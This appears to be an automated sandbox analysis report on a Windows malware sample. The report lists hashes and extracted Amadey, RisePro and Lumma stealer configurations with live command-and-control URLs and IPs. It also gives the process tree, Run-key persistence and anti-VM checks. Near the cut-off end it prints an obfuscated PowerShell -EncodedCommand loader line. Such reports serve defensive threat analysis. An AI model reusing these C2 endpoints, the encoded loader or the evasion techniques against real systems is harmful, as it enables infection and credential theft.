Analysis
-
max time kernel
142s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
12-05-2024 17:20
Static task
static1
Behavioral task
behavioral1
Sample
2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exe
Resource
win10v2004-20240508-en
General
-
Target
2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exe
-
Size
1.8MB
-
MD5
a545015277adb79890693c2aa95bd1ad
-
SHA1
64d174ec5dedfc9e25887213221fb171707ef8a7
-
SHA256
2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205
-
SHA512
560e9f3bc48a8e40133336f320feb22774c0da73c6947af4a159b881086ab07d60326f63c4cd41041fee23b9223188243ce1a121cdb200751ef068bf9499eb37
-
SSDEEP
49152:ZpvNociR3yxx1JLSYwy9AdBVoHwVC5Sm2EfR/kCN:dOgDhSThxkFDS
Malware Config
Extracted
amadey
4.20
http://5.42.96.141
http://5.42.96.7
-
install_dir
908f070dff
-
install_file
explorku.exe
-
strings_key
b25a9385246248a95c600f9a061438e1
-
url_paths
/go34ko8/index.php
Extracted
risepro
147.45.47.126:58709
Extracted
lumma
https://smallelementyjdui.shop/api
https://sofaprivateawarderysj.shop/api
https://lineagelasserytailsd.shop/api
https://tendencyportionjsuk.shop/api
https://headraisepresidensu.shop/api
https://appetitesallooonsj.shop/api
https://minorittyeffeoos.shop/api
https://prideconstituiiosjk.shop/api
Signatures
-
Detect ZGRat V1 3 IoCs
Processes:
resource yara_rule behavioral1/memory/2820-639-0x000002166FCA0000-0x00000216734D4000-memory.dmp family_zgrat_v1 behavioral1/memory/2820-652-0x0000021675980000-0x00000216759A4000-memory.dmp family_zgrat_v1 behavioral1/memory/2820-647-0x0000021675D90000-0x0000021675E9A000-memory.dmp family_zgrat_v1 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
Processes:
axplons.exeaxplons.exeexplorku.exeexplorku.exeaxplons.exeaxplons.exeexplorku.exeamers.exeexplorku.exe2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exe2649a27fea.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amers.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2649a27fea.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
explorku.exe2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exeamers.exeaxplons.exeexplorku.exe2649a27fea.exeaxplons.exeaxplons.exeexplorku.exeexplorku.exeaxplons.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amers.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2649a27fea.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amers.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2649a27fea.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ISetup8.exeregasm.exeu1n4.1.exe2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exeexplorku.exeamers.exeaxplons.exeNewB.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation ISetup8.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation regasm.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation u1n4.1.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation 2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation explorku.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation amers.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation axplons.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation NewB.exe -
Executes dropped EXE 25 IoCs
Processes:
explorku.exeamers.exeaxplons.exe2649a27fea.exelumma1.exeinstaller.exeaxplons.exeexplorku.exeexplorku.exeaxplons.exefile300un.exeNewB.exeISetup8.exetoolspub1.exe4767d2e713f2021e8fe856e3ea638b58.exeu1n4.0.exeu1n4.1.exe55hXfWg1qZszuDybS5qUeTwg.exec32VbdEYRsdEsPrNP8QUGh7r.exe4767d2e713f2021e8fe856e3ea638b58.exeykXx40b57sFbCzwNvVKAiQFS.exeUFQnVOvaLK3pNgTPUJBUc789.exe8vAuHCIvORJJMbSj46MehyUu.exeaxplons.exeexplorku.exepid Process 1608 explorku.exe 4976 amers.exe 3052 axplons.exe 3820 2649a27fea.exe 3180 lumma1.exe 1668 installer.exe 1956 axplons.exe 896 explorku.exe 3084 explorku.exe 3528 axplons.exe 1776 file300un.exe 4884 NewB.exe 2128 ISetup8.exe 2004 toolspub1.exe 4976 4767d2e713f2021e8fe856e3ea638b58.exe 4608 u1n4.0.exe 5064 u1n4.1.exe 4856 55hXfWg1qZszuDybS5qUeTwg.exe 452 c32VbdEYRsdEsPrNP8QUGh7r.exe 4436 4767d2e713f2021e8fe856e3ea638b58.exe 4024 ykXx40b57sFbCzwNvVKAiQFS.exe 2188 UFQnVOvaLK3pNgTPUJBUc789.exe 2344 8vAuHCIvORJJMbSj46MehyUu.exe 1200 axplons.exe 440 explorku.exe -
Identifies Wine through registry keys 2 TTPs 10 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
explorku.exeamers.exeaxplons.exeexplorku.exeaxplons.exe2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exeaxplons.exeexplorku.exeaxplons.exeexplorku.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine explorku.exe Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine amers.exe Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine explorku.exe Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine 2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exe Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine explorku.exe Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine explorku.exe -
Loads dropped DLL 2 IoCs
Processes:
u1n4.0.exepid Process 4608 u1n4.0.exe 4608 u1n4.0.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/files/0x0009000000023314-58.dat themida behavioral1/memory/3820-74-0x0000000000E30000-0x00000000014A9000-memory.dmp themida behavioral1/memory/3820-75-0x0000000000E30000-0x00000000014A9000-memory.dmp themida behavioral1/memory/3820-77-0x0000000000E30000-0x00000000014A9000-memory.dmp themida behavioral1/memory/3820-76-0x0000000000E30000-0x00000000014A9000-memory.dmp themida behavioral1/memory/3820-73-0x0000000000E30000-0x00000000014A9000-memory.dmp themida behavioral1/memory/3820-87-0x0000000000E30000-0x00000000014A9000-memory.dmp themida behavioral1/memory/3820-89-0x0000000000E30000-0x00000000014A9000-memory.dmp themida behavioral1/memory/3820-88-0x0000000000E30000-0x00000000014A9000-memory.dmp themida behavioral1/memory/3820-86-0x0000000000E30000-0x00000000014A9000-memory.dmp themida behavioral1/memory/3820-142-0x0000000000E30000-0x00000000014A9000-memory.dmp themida behavioral1/files/0x00090000000235dd-664.dat themida behavioral1/memory/3316-670-0x0000000140000000-0x0000000140B56000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
explorku.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2649a27fea.exe = "C:\\Users\\Admin\\1000006002\\2649a27fea.exe" explorku.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\installer.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000011001\\installer.exe" explorku.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
2649a27fea.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2649a27fea.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 47 ip-api.com 154 api.myip.com 155 api.myip.com 156 ipinfo.io 157 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
Processes:
2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exeexplorku.exeamers.exeaxplons.exeaxplons.exeexplorku.exeexplorku.exeaxplons.exeaxplons.exeexplorku.exepid Process 2012 2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exe 1608 explorku.exe 4976 amers.exe 3052 axplons.exe 1956 axplons.exe 896 explorku.exe 3084 explorku.exe 3528 axplons.exe 1200 axplons.exe 440 explorku.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
lumma1.exepowershell.exedescription pid Process procid_target PID 3180 set thread context of 2288 3180 lumma1.exe 102 PID 1748 set thread context of 1268 1748 powershell.exe 132 -
Drops file in Windows directory 2 IoCs
Processes:
amers.exe2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exedescription ioc Process File created C:\Windows\Tasks\axplons.job amers.exe File created C:\Windows\Tasks\explorku.job 2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 1252 powershell.exe 1336 powershell.exe 448 powershell.exe 4796 powershell.exe 1748 powershell.exe 2836 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 5032 2004 WerFault.exe 119 2508 2128 WerFault.exe 118 3660 4608 WerFault.exe 121 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
toolspub1.exeu1n4.1.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1n4.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1n4.1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1n4.1.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
u1n4.0.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u1n4.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u1n4.0.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exeexplorku.exeamers.exeaxplons.exeinstaller.exeaxplons.exeexplorku.exeexplorku.exeaxplons.exepowershell.exeu1n4.0.exepid Process 2012 2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exe 2012 2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exe 1608 explorku.exe 1608 explorku.exe 4976 amers.exe 4976 amers.exe 3052 axplons.exe 3052 axplons.exe 1668 installer.exe 1668 installer.exe 1956 axplons.exe 1956 axplons.exe 896 explorku.exe 896 explorku.exe 1668 installer.exe 3084 explorku.exe 3084 explorku.exe 3528 axplons.exe 3528 axplons.exe 1748 powershell.exe 1748 powershell.exe 1748 powershell.exe 1748 powershell.exe 1748 powershell.exe 1748 powershell.exe 1748 powershell.exe 1748 powershell.exe 1748 powershell.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe 4608 u1n4.0.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
installer.exepowershell.exepowershell.exeregasm.exe4767d2e713f2021e8fe856e3ea638b58.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exedescription pid Process Token: SeDebugPrivilege 1668 installer.exe Token: SeDebugPrivilege 1748 powershell.exe Token: SeDebugPrivilege 2836 powershell.exe Token: SeDebugPrivilege 1268 regasm.exe Token: SeDebugPrivilege 4976 4767d2e713f2021e8fe856e3ea638b58.exe Token: SeImpersonatePrivilege 4976 4767d2e713f2021e8fe856e3ea638b58.exe Token: SeDebugPrivilege 2820 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe -
Suspicious use of FindShellTrayWindow 8 IoCs
Processes:
amers.exeu1n4.1.exepid Process 4976 amers.exe 5064 u1n4.1.exe 5064 u1n4.1.exe 5064 u1n4.1.exe 5064 u1n4.1.exe 5064 u1n4.1.exe 5064 u1n4.1.exe 5064 u1n4.1.exe -
Suspicious use of SendNotifyMessage 7 IoCs
Processes:
u1n4.1.exepid Process 5064 u1n4.1.exe 5064 u1n4.1.exe 5064 u1n4.1.exe 5064 u1n4.1.exe 5064 u1n4.1.exe 5064 u1n4.1.exe 5064 u1n4.1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exeexplorku.exeamers.exeaxplons.exelumma1.exefile300un.execmd.exeNewB.exeISetup8.exe4767d2e713f2021e8fe856e3ea638b58.exepowershell.exedescription pid Process procid_target PID 2012 wrote to memory of 1608 2012 2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exe 93 PID 2012 wrote to memory of 1608 2012 2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exe 93 PID 2012 wrote to memory of 1608 2012 2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exe 93 PID 1608 wrote to memory of 2060 1608 explorku.exe 96 PID 1608 wrote to memory of 2060 1608 explorku.exe 96 PID 1608 wrote to memory of 2060 1608 explorku.exe 96 PID 1608 wrote to memory of 4976 1608 explorku.exe 97 PID 1608 wrote to memory of 4976 1608 explorku.exe 97 PID 1608 wrote to memory of 4976 1608 explorku.exe 97 PID 4976 wrote to memory of 3052 4976 amers.exe 98 PID 4976 wrote to memory of 3052 4976 amers.exe 98 PID 4976 wrote to memory of 3052 4976 amers.exe 98 PID 1608 wrote to memory of 3820 1608 explorku.exe 99 PID 1608 wrote to memory of 3820 1608 explorku.exe 99 PID 1608 wrote to memory of 3820 1608 explorku.exe 99 PID 3052 wrote to memory of 3180 3052 axplons.exe 100 PID 3052 wrote to memory of 3180 3052 axplons.exe 100 PID 3052 wrote to memory of 3180 3052 axplons.exe 100 PID 3180 wrote to memory of 2288 3180 lumma1.exe 102 PID 3180 wrote to memory of 2288 3180 lumma1.exe 102 PID 3180 wrote to memory of 2288 3180 lumma1.exe 102 PID 3180 wrote to memory of 2288 3180 lumma1.exe 102 PID 3180 wrote to memory of 2288 3180 lumma1.exe 102 PID 3180 wrote to memory of 2288 3180 lumma1.exe 102 PID 3180 wrote to memory of 2288 3180 lumma1.exe 102 PID 3180 wrote to memory of 2288 3180 lumma1.exe 102 PID 3180 wrote to memory of 2288 3180 lumma1.exe 102 PID 1608 wrote to memory of 1668 1608 explorku.exe 103 PID 1608 wrote to memory of 1668 1608 explorku.exe 103 PID 3052 wrote to memory of 1776 3052 axplons.exe 111 PID 3052 wrote to memory of 1776 3052 axplons.exe 111 PID 1776 wrote to memory of 3160 1776 file300un.exe 113 PID 1776 wrote to memory of 3160 1776 file300un.exe 113 PID 3160 wrote to memory of 1748 3160 cmd.exe 114 PID 3160 wrote to memory of 1748 3160 cmd.exe 114 PID 3052 wrote to memory of 4884 3052 axplons.exe 115 PID 3052 wrote to memory of 4884 3052 axplons.exe 115 PID 3052 wrote to memory of 4884 3052 axplons.exe 115 PID 4884 wrote to memory of 4560 4884 NewB.exe 116 PID 4884 wrote to memory of 4560 4884 NewB.exe 116 PID 4884 wrote to memory of 4560 4884 NewB.exe 116 PID 4884 wrote to memory of 2128 4884 NewB.exe 118 PID 4884 wrote to memory of 2128 4884 NewB.exe 118 PID 4884 wrote to memory of 2128 4884 NewB.exe 118 PID 4884 wrote to memory of 2004 4884 NewB.exe 119 PID 4884 wrote to memory of 2004 4884 NewB.exe 119 PID 4884 wrote to memory of 2004 4884 NewB.exe 119 PID 4884 wrote to memory of 4976 4884 NewB.exe 120 PID 4884 wrote to memory of 4976 4884 NewB.exe 120 PID 4884 wrote to memory of 4976 4884 NewB.exe 120 PID 2128 wrote to memory of 4608 2128 ISetup8.exe 121 PID 2128 wrote to memory of 4608 2128 ISetup8.exe 121 PID 2128 wrote to memory of 4608 2128 ISetup8.exe 121 PID 2128 wrote to memory of 5064 2128 ISetup8.exe 126 PID 2128 wrote to memory of 5064 2128 ISetup8.exe 126 PID 2128 wrote to memory of 5064 2128 ISetup8.exe 126 PID 4976 wrote to memory of 2836 4976 4767d2e713f2021e8fe856e3ea638b58.exe 130 PID 4976 wrote to memory of 2836 4976 4767d2e713f2021e8fe856e3ea638b58.exe 130 PID 4976 wrote to memory of 2836 4976 4767d2e713f2021e8fe856e3ea638b58.exe 130 PID 1748 wrote to memory of 1268 1748 powershell.exe 132 PID 1748 wrote to memory of 1268 1748 powershell.exe 132 PID 1748 wrote to memory of 1268 1748 powershell.exe 132 PID 1748 wrote to memory of 1268 1748 powershell.exe 132 PID 1748 wrote to memory of 1268 1748 powershell.exe 132
Processes
-
C:\Users\Admin\AppData\Local\Temp\2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exe"C:\Users\Admin\AppData\Local\Temp\2048bcca69c7a5f69d1b2fc41ab46116de52fc22e3d165ecd98c37f97d727205.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"3⤵PID:2060
-
-
C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:2288
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIAAdZ7GCFVn+YiAAewAKACAAIAAgACAAcABhAHIAYQBtACAAKAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJACFaLGCLAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJADgf/l6LAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAA9hPZTCgAgACAAIAAgACkACgAKACAAIAAgACAAJADOmF17IAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoAIAAgACAAIAAkAM6YXXsuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJADOmF17LgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJAA1dDZ0IAA9ACAAJADOmF17LgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQAhWixgiwAIAAkAOB/+XopAAoAIAAgACAAIAAkANiY6pYgAD0AIAAkADV0NnQuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAD2E9lMsACAAMAAsACAAJAA9hPZTLgBMAGUAbgBnAHQAaAApAAoACgAgACAAIAAgACQAzphdey4ARABpAHMAcABvAHMAZQAoACkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJADYmOqWCgB9AAoACgAkAENosYIgAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAHIAawAxAGsAMgBzAGwAMwBrAC4AdABtAHAAJwA7AAoAJACyg7GCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAENosYIpADsACgAKACQAhWixgiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEMAMwAsADAAeAAyADEALAAwAHgARgBEACwAMAB4AEEARAAsADAAeAAxAEEALAAwAHgANQA0ACwAMAB4ADYARAAsADAAeAA2ADQALAAwAHgAQgBDACwAMAB4ADkARQAsADAAeAAzAEEALAAwAHgAQwBFACwAMAB4AEMAMAAsADAAeAA1AEQALAAwAHgAOQBCACwAMAB4AEMAMQAsADAAeAA3AEEALAAwAHgAOQA1ACwAMAB4ADgANAAsADAAeABGADUALAAwAHgARABCACwAMAB4ADcAMQAsADAAeABBADIALAAwAHgAMAAzACwAMAB4ADIAOAAsADAAeAAzAEYALAAwAHgARQBEACwAMAB4ADIAQ